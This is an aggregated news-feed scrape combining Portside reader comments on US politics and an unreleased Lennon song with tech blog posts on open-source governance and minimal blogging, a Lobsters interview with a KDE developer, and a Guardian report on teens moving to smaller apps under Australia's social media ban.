Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More…
Portside
portside.org
2025-12-05 03:48:09
Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More…
jay
Thu, 12/04/2025 - 22:48
...
Discussion of outlawing stock buybacks that were once illegal would be a crucial way to address the wage issue.
Given the corruption of our lawmakers this has a very long shot of being realized but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.
Jessica Benjamin
Students attending school in the winter, mostly in the Midwest or the East Coast, get a Snow Day if a heavy snowstorm blankets their town then school will be canceled and kids can play all day. In Los Angeles, students have been not going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.
This is horrible; I was a shop steward for 35 years in the carpenters union local 157 NYC.
We take a harassment class and get certified among a dozen other certifications.
None of this only happens on non union jobs.
No woman is harassed on any of my jobs let alone killed?
Harassment of women is on the rise and maybe it is because a rapist is in the White House?
You can’t just look the other way, if you do you are an enabler.
There are so many things the public see and turns a blind eye to!!!
Humans are tribal and we have good tribes and bad it is your choice.
You can’t stand and listen to the president call a woman reporter “Piggie’ and not call him out on the spot.
Stupid and arrogant not very good qualities in the most powerful job in the world.
My union is the only place where women get paid the same pay as the men.
Speak up not after the fact.
Manipulation is rampant.
John Campo
Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.
"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."
The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.
I would call it building a coalition around central shared goals. In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process. If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there. We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.
Are you going to believe your lying wallet or your lying president?
When Donald Trump became president in 2016, he was fortunate that he was inheriting President Barack Obama's economy. It was such a strong economy he inherited that it took him almost 4 years to fuck it up. Although throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump back into the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office in 2020 with the biggest. loss of jobs since Hoover.
In 2020, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims Biden's inflation at the time he came into office was bad, that has gotten worse, too since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.
Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.
A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.
Even Trump must realize that since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.
But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.
Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.
He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”
Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.
Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.
Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.
I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.
Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called
Watching Rainbows
and was recorded in 1969 during the
Let it Be
sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries,
Get Back,
nor was it included on any of the
Anthology
releases. Here are the lyrics, most likely invented by Lennon on the spot:
Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some
Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t
Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me
Please shoot me
Even before the
Now and Then
single was released in 2023 and announced as the “last Beatles song,” I thought
Rainbows
should be stitched together with McCartney’s
Pillow for Your Head
and Harrison’s
Mother Divine
, both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out
Abby Road
. The connecting tissue for
Divine Rainbow Pillow
could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard
Now and Then
and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song—
anything
other than
Now and Then
, but I’ll save those for a later post - ha!)
Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT
Virtual Event ⸱ Zoom link shared after registration
Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.
We will record this briefing and send it to all who register.
After the briefing, you are welcome to join an optional 30-minute informal Q&A.
This is a partisan, political event. We invite our 501(c)(3) supporters and partners to attend in their personal capacity. Please consult your organization's legal counsel with any questions.
About Movement Voter PAC
MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.
We just put out our
2025 reca
p — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.
MVP
operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.
We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)
I feel a change is happening in how people produce and (want to) consume software, and I want to give my two cents on the matter.
It has become more mainstream to see people critical of "Big Tech".
Enshittification
has become a familiar term even outside the geek community. Obnoxious "AI" features that nobody asked for get crammed into products. Software that spies on its users is awfully common. Software updates have started crippling existing features, or have deliberately stopped being available, so more new devices can be sold. Finally, it is increasingly common to get obnoxious ads shoved in your face,
even in software you have already paid for
.
In short, it has become hard to really
trust
software. It often does not act in the user's best interest. At the same time, we are
entrusting
software with more and more of our lives.
Thankfully, new projects are springing up which are using a different governance model. Instead of a for-profit commercial business, there is a non-profit backing them. Some examples of more or less popular projects:
Some of these are older projects, but there seems to be something in the air that is causing more projects to move to non-profit governance, and for people to choose these.
As I was preparing this article, I saw an announcement that
ghostty
now has a non-profit organisation behind it. At the same time, I see more reports from developers
leaving GitHub for Codeberg
, and in the mainstream more and more people are switching to Signal.
From a user perspective, free software and open source software (FOSS) has advantages over proprietary software. For instance, you can study the code to see what it does. This alone can deter manufacturers from putting in user-hostile features. You can also remove or change what you dislike or add features you would like to see. If you are unable to code, you can usually find someone else to do it for you.
Unfortunately, this is not enough. Simply having the ability to see and change the code does not help when the program is a web service. Network effects will ensure that the "main instance" is the only viable place to use this; you have all your data there, and all your friends are there. And hosting the software yourself is hard for non-technical people. Even highly technical people often find it too much of a hassle.
Also, code can be very complex! Often, only the team behind it can realistically further develop it. This means you can run it yourself, but still are dependent on the manufacturer for the direction of the product. This is how you get, for example, AI features in GitLab and ads in Ubuntu Linux. One can technically remove or disable those features, but it is hard to keep such a modified version (a
fork
) up with the manufacturer's more desirable changes.
The reason is that the companies creating these products are still motivated by profit and increasing shareholder value. As long as the product still provides (enough) value, users will put up with misfeatures. The (perceived) cost of switching is too high.
Let us say a non-profit is behind the software. It is available under a 100% FOSS license. Then there are still ways things can go south. I think this happens most commonly if the funding is not in order.
For example, Mozilla is often criticised for receiving funding from Google. In return, it uses Google as the default search. To make it less dependent on Google, Mozilla acquired
Pocket
and integrated it into the browser. It also added ads on the home screen. Both of these actions have
also
been criticized. I do not want to pick on Mozilla (I use Firefox every day). It has clearly been struggling to make ends meet in a way that is consistent with its goals and values.
I think the biggest risk factor is (ironically) if the non-profit does not have a sustainable business model and has to rely on funding from other groups. This can compromise the vision, like in Mozilla's case. For web software, the obvious business model is a SaaS platform that offers the software. This allows the non-profit to make money from the convenience of not having to administer it yourself.
Ah, good old volunteer driven FOSS. Personally, I prefer using such software in general. There is no profit motive in sight and the developers are just scratching their own itch. Nobody is focused on growth and attracting more customers. Instead, the software does only what it has to do with a minimum of fuss.
I love that aspect, but it is also a problem. Developers often do not care about ease of use for beginners. Software like this is often a power tool for power users, with lots of sharp edges. Perfect for developers, not so much for the general public.
More importantly, volunteer driven FOSS has other limits. Developer
burn-out
happens
more
than we would like to
admit
, and for-profit companies tend to
strip-mine
the
commons
.
There are some solutions available for volunteer-driven projects. For example
Clojurists together
,
thanks.dev
, the
Apache Foundation
, the
Software Freedom Conservancy
and
NLNet
all financially support volunteer-driven projects. But it is not easy to apply to these, and volunteer-driven projects are often simply not organized in a way to receive money.
With a non-profit organisation employing the maintainers of a project, there is more guarantee of continuity. It also can ensure that the "boring" but important work gets done. Good interface design, documentation, customer support. All that good stuff. If there are paying users, I expect that you get some of the benefits of corporate-driven software and less of the drawbacks.
That is why I believe these types of projects will be the go-to source for sustainable, trustworthy software for end-users. I think it is important to increase awareness about such projects. They offer alternatives to Big Tech software that are palatable to non-technical users.
Warner Bros Begins Exclusive Deal Talks With Netflix
We've detected unusual activity from your computer network
To continue, please click the box below to let us know you're not a robot.
Why did this happen?
Please make sure your browser supports JavaScript and cookies and that you are not
blocking them from loading.
For more information you can review our
Terms of Service
and
Cookie Policy
.
Need Help?
For inquiries related to this message please
contact
our support team
and provide the reference ID below.
Before social media became what it is today I used to blog a lot. And I wasn't the only one, many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a selfhosted blog, or a platform like wordpress or
blogger).
The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is
shrinking.
There seems to be some resurgence into the old web now, time will tell if it gains any real ground. It's an uphill battle: Besides most online eyeballs now being glued to social media apps, we're seeing
AI
take over the way people interact with the internet altogether. Back in the old days if you wanted to know more about something you'd google the term and start going through the websites Google said are most relevant. Now
AI
is a lot more efficient in getting you the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website the
AI
will fetch it behind the scenes and summarize it for you. From a
UX
perspective this is the obvious direction things will continue to
go.
A second problem is that of quality: people who put a lot of time in their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content doesn't live on the open web anymore (but at least there are no ads here). This is probably a win for writers, as well as the quality of the overall content being produced (and read) globally, but it's a loss for the open
web.
So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good
articles?
Fighting fire (
AI
) with fire
(
AI
)
Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and
a travel/picture blog called mijnrealiteit
. Whenever I get this feeling, I start with updating the blog software: Throughout the years both blogs have gone through different iterations: from custom
CMS
systems, to WordPress instances with custom themes, to ending up with simple statically generated websites. You can
find
some
historical
posts
here
.
So towards an
AI
coding tool I turn, which have the power to write/change hundreds of lines of code in seconds with a simple one sentence instruction.
AI
coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed/quality outpaces what a human developer can do. But there are also many cases where it writes junk (called slop) and does things that make no
sense.
I actually wanted to do the very opposite of what "vibe coders" typically use
AI
tools for: instead of providing a simple (and vague) instruction to let the
AI
go crazy and build a new blog from scratch, I used it to strip/simplify my existing blog software towards the open web hygiene I
value:
Remove all external javascript (visitor trackers,
etc)
Remove other third party dependencies as well, like fonts loaded from
Google
Make the
HTML
/
CSS
structure "minimal" and dead simple, with a design that works well on mobile and
desktop
Migrate away from the unfortunately unmaintained static site generation framework
WinterSmith
, instead use a super simple script that just generates all pages
inline.
You can find the code for mijnrealiteit
on github
, I'll publish the code for this blog soon as
well.
It's all live now, as well as super minimal "about me" site on
mvr.com
. So I can get back to blogging! Will anyone actually read anything I post? I won't know since I removed all trackers. So for now I am screaming into the
void.
Lobsters Interview with Aks
Lobsters
lobste.rs
2025-12-05 02:41:30
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!
Please introduce yourself!
I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up...
I know
@Aks
from IRC. He works on KDE Software, has made many lovely games and I even use his
colorscheme
in my terminal!
Please introduce yourself!
I'm Akseli but I usually go as
Aks
on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.
How did you first discover computers as a kid?
I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware. While all my peers at school would have PS2s, I played on NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook, I always wanted to make my own. And
I did
!
What were your first games like?
My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is
really bad
, but that was sort of the point. The next game I made when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, and 3D platformer, and FPS called
Penance
that has about 19k downloads. You can find
my games
on Itch. Lately though, I haven't had the energy to finish my game projects e.g. Artificial Rage:
https://codeberg.org/akselmo/Artificial-Rage
I sank a fair few hours into Penance! I also really liked the
Christmas game
you made your sister. Do you ever put Easter eggs in code or often make projects for others like that?
I put some Easter eggs. For example someone complained that in Penance all the weapons look like woolen socks(?). So I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it as a secret, which proved difficult! We have made a
few
games
together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.
How do you ideate the game play, style and such things?
While playing, I usually think it "would be cool if I had this game but changed this and that.." which provides a great starting point. Then it just naturally evolves into it's own thing. Penance was pretty much me going "I want Quake but with random generated levels" but then I ended up making a campaign with handcrafted levels to it anyway, beside the random generated endless mode.
Really, I just make things
I
want to play. People liking it is just a bonus. One of my favorite game projects is
Castle Rodok
because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.
What languages and technologies did you use?
With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quick, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices so I can't talk about them due to NDAs.
Most of my games have been in Unity, but
Crypt of Darne
uses Python and I also have played around with
C and Odin
for my game projects.
I have tried LISPs and functional programming languages and such, but I just have hard time with them. Especially with those that propose a completely different syntax for me. I haven't had any projects with Rust but I liked tinkering with it it, besides the
'
lifetime syntax which I easily miss. I am very boring when it comes to programming languages, I like to stick with what I know. I wanderlust about what I can create: Games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, If I feel like working on a game, I go with the flow and do that.
What was your experience with different OS before finding
KDE
?
I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick to it because I could not play any games I owned in Linux. When I learned that Linux systems can in-fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and it's compositing eating all the FPS, so I gave up for a while. 6 months later I tried Kubuntu which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with the compositing eating FPS in games. KDE was also very easy to learn and understand. I didn't really need to customize it. Then I found an annoying bug I wanted to fix it and started to contribute.
What was the first contribution experience like?
I had no idea how to do anything with C++. I learned C from scratch making
Artificial Rage
, studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. It wasn't very big though, I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on Gitlab helped wrap it up. One of my first larger contributions though was adding region and language settings to system settings. This allowed users to change, for example, date-time settings differently than currency. This was mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.
It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you. For example, the signal and slot system or objects having parent objects that clear their children when they're deconstructed. Qt's documentation is also pretty great.
I'm still learning and don't have much in depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense. It should autogenerate as part of the compilation. I found some such header generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.
What are your thoughts on Linux over all, big things which need changing but no one is working on or nice initiatives which you think will improve things, etc.?
The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEM's start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people moved over. Just few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.
Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance than a computer, immutable systems are very nice: They allow them to jump from broken state back to working state with ease (select different boot entry at startup).
Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: Make it easy to install, test, run, etc... If Linux desktops can get more hardware manufacturers on board to install Linux desktop as default, that will certainly help too. Also shoutout to the [EndOf10](
https://endof10.org/
initiative, when I shared it around to my non-nerdy-friends, they were very curious about Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels, we need to stop fighting "whats the best desktop" and work together more.
BTW, if anyone reading this has been Linux curious, go for it! Take a secondary device and play around with it there. And I also want to point out that dont be afraid to contribute to things you like in any way you can, be it software or hardware or actual physical world.
How do you see it in light of more phone usage, less desktop usage? Have you any impressions of governments or businesses moving to linux?
Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.
Phones are the king of "basic stuff" and for many people a tablet functions as a simple internet-appliance. I can only hope that projects like [PostmarketOS](
https://postmarketos.org/
will help to keep these tablets and phones working when the regular android updates stop, to ease the avalanche of e-waste.
When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I do not know, but I would like to drive more for it.
It's certainly an area where we should try to help as much as possible as well.
How can we (individuals or organizations) help?
Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter, just say it's something you use and elaborate when people ask. Too many times I've seen people pushed away from using Linux desktop because people are very.. Pushy. As surprising it may be, not many people really care as much as we do!
Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small.
It does not need to be an overnight change, just small things here and there.
How many resources do you have compared to the demands of everything you are working on?
We're definitely stretched. We always could use more help, though C++ seems to deter that help a bit, which I can understand. But if I could start from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.
What prerequisites are there for contributing?
We have Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute.) All of it is
documented
. When triaging, I am trying to more often tag bugs in bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy so we hope people put some effort into trying to learn things too, of course.
How could bug reporting be improved?
I think we could half-automate bug reports, to make things easier: Gather basic information and ask basic questions upfront, without needing to open a web browser. For crash reports, we use a tool called
DrKonqi
: When app crashes, it gathers backtraces etc. automagically and allows the user to type what happened in a field. Something similar for regular ol' bugs would be great. Games do this with taking screenshots and logs when player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: Go through some bug reports, see if you can reproduce them or not, and report back to it with your system information.
Anyone
can do it, it's not a difficult job, just a bit tedious, especially when there's thousands of bug reports and 10 people going through them.
How do you approach problem solving?
Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at same time:
Sometimes I try to fix the bug to figure it out: Why does a given change fix the bug?
The fix may not be the correct fix yet.
Of course, a well written bugreport with good reproduction steps helps a lot!
git blame
is a good friend, asking people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s.
Talking to other people
Writing notes down as you try to understand the bug
Anything that pokes your brain in multiple different directions.
I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?
Sometimes the code just "feels right" or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.
What inspires you to have an online presence (in irc, commenting, blog posts etc.)? How do you decide when to make a blog post or not?
For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.
I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee-breaks and office chitchat, so I hang about in IRC, Matrix, Fediverse, Lobsters etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.
Due to learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web-browser and do something else. The hardest part is actually noticing it.
Do you have any interesting personal tools? I use your
colorscheme
.
I journal a lot on a remarkable2 tablet when working, writing down what I have done, should do or notes figuring out problems. Writing by hand helps me remember things too. I made an RSS "newspaper"
script
for my tablet too, which also shows the daily weather now.
I also use
todo.txt
for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called
KomoDo
.
Then I use Obsidian for any technical notes and know-how, like programming and computer things that are pain to write by hand.
It was even before Github started getting "AI" stuff. I just got tired of Github being a social media site instead of a good platform. SourceHut would have been nice too, I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.
Teens hoping to get around Australia’s social media ban are rushing to smaller apps. Where are they going?
Guardian
www.theguardian.com
2025-12-05 02:11:23
As Meta begins deleting accounts and the deadline looms, children have already begun to flock to platforms not included in the banned list, like Coverstar, Lemon8, Yope and RednoteAustralia social media ban explained: everything you need to knowGet our breaking news email, free app or daily news pod...
As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.
One teenaged
TikTok
influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”
From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.
Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.
Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.
The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.
“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.
“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”
Here’s what we know about some of the apps where children are migrating.
Coverstar
The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.
A screenshot from Yope. The Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission
Photograph: Yope
The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.
Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.
Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.
Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.
“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.
AI has been widely used in social media moderation for years, however Beckett says it has significant limitations.
“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”
Coverstar has been contacted for comment.
Lemon8
Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.
Users can connect a TikTok account, allowing them to
seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.
However, on Tuesday
Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.
Yope
With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.
Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.
Similar to Lemon8, Australia’s eSafety commissioner said she had written to Yope advising them to self assess. Ismailau told the Guardian he had not received any correspondence, however was “ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms”.
He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.
Australian government adds Reddit and Kick to under-16s social media ban – video
“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”
Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.
A mobile phone number is required to create an account.
Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.
Rednote
Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.
Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.
“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”
However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.
Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.
“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”
Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.
“They’re going to get around it,” Beckett said. “They’ll figure it out.”
★ Alan Dye Was in Tim Cook’s Blind Spot
Daring Fireball
daringfireball.net
2025-12-05 01:53:12
How could someone who would even *consider* leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?...
Speaking at a town hall event hosted by MSNBC’s Chris Hayes and
Recode’s Kara Swisher, Cook said Facebook put profits above all
else when it allegedly allowed user data to be taken through
connected apps. [...]
When asked what he would do if he were in Zuckerberg’s position,
Cook replied: “What would I do? I wouldn’t be in this situation.”
“The truth is we could make a ton of money if we monetized our
customer, if our customer was our product,” Cook said. “We’ve
elected not to do that.”
“Privacy to us is a human right. It’s a civil liberty, and
something that is unique to America. This is like freedom of
speech and freedom of the press,” Cook said. “Privacy is right up
there with that for us.”
